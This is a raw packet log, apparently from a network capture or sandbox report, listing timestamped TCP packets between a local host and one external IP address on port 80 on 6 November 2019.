Nov 6, 2019 14:02:48.749511003 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749598026 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.749742031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749771118 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.749859095 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.750088930 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.750133038 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.750322104 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.750420094 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.750458956 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.750618935 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.762056112 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.936714888 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.936773062 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.936830044 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.936908007 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937114000 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.937172890 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937287092 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937319994 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937386036 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.937441111 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937562943 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.937621117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937665939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937752008 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.937839031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937886000 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.937973022 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.938008070 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938054085 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938133001 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.938364983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938396931 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938524961 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.938642979 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938688040 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938790083 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.938795090 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.938955069 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.938975096 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:48.939198971 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:48.942910910 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.123698950 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.123774052 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.123986006 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124037027 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124192953 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124258041 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.124398947 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124677896 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.124706030 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124834061 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.124975920 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.125180960 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.125323057 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.125425100 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.125463963 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.125636101 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.125684023 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.125852108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.125935078 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.125993013 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126163006 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.126188040 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126209974 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126394987 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.126537085 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126554012 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126673937 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126691103 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.126730919 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.126980066 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.127016068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127033949 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127181053 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127199888 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127228975 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.127471924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127489090 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127506971 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.127753973 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127756119 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.127770901 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.127999067 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.128043890 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128062010 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128230095 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128246069 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.128254890 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128374100 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128498077 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.128544092 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128664970 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128725052 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.128920078 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.128966093 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.129082918 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.129209995 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.129600048 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.129618883 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.129631996 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.129853964 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.132560968 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.310599089 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.310673952 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.310875893 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.310906887 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.310939074 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.311193943 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.311217070 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311250925 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311357975 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311377048 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.311389923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311578989 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.311783075 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311821938 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.311954975 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.311991930 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312022924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312127113 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.312163115 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312216043 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312283993 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312326908 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.312449932 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312500954 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.312633038 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312665939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312668085 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.312794924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312825918 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312835932 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.312951088 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.312999010 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.313004017 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.313189983 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.316919088 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.319035053 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319188118 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319279909 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.319286108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319308043 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319431067 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319468975 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.319639921 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.319808960 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.319921970 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320013046 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.320106983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320133924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320281029 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320341110 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320349932 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.320549011 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.320615053 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320647001 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320784092 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.320831060 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.320947886 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321075916 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.321183920 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321223021 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321331978 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.321377039 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321485996 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321507931 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321527958 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321546078 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.321630001 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321784973 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321872950 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.321928978 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322053909 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322151899 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322191954 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322213888 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322313070 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322371960 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322463989 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322518110 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322670937 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322698116 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322720051 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322792053 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.322871923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.322967052 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.326945066 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.497519970 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.497564077 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.497687101 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.497740984 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.497919083 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.498239040 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.498297930 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.498431921 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.498866081 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.498893023 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.499130964 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.503452063 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503499985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503525972 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503551006 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503603935 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.503673077 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503700018 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.503814936 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.504018068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504076958 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504115105 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504208088 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.504440069 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504477024 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504589081 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.504604101 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504621983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504760027 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.504810095 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.504983902 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.505382061 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.513307095 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513355017 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513430119 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.513489962 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513567924 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.513603926 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513632059 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513684988 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.513915062 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.513976097 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514010906 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514100075 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514259100 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514291048 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514342070 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514390945 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514420033 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514466047 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514697075 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514767885 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514797926 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514847040 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.514892101 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.514954090 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515067101 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.515149117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515222073 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515244961 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.515336990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515341997 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.515367031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515443087 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.515664101 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515691996 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515799046 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515840054 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515858889 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.515953064 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.515973091 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516072989 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516104937 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516201019 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516315937 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516345978 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516408920 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516412020 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516496897 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516602993 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516685009 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516798973 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.516875029 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516930103 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.516976118 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.517018080 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.517054081 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.517144918 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.521128893 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.684446096 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.684468985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.684578896 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.684673071 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.684737921 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.684768915 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.684787035 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.684926987 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685003996 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.685219049 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685285091 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685301065 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685354948 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685378075 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.685518026 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.685573101 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685623884 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685674906 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.685735941 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685839891 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.685877085 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.685980082 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.686048985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686084032 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686151028 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.686388969 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686428070 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686513901 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686551094 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686566114 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.686785936 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.686819077 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686871052 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.686976910 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.687000990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687043905 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687104940 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.687340021 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687357903 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687484026 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687489986 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.687637091 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.687839985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.687988997 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.687989950 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688069105 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688085079 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688144922 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.688230991 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688256979 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688327074 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.688565969 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688627005 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688673973 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688699961 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.688714027 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.688834906 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.689002991 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689034939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689133883 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.689208031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689239979 CET	80	49163	104.168.198.208	192.168.1.16
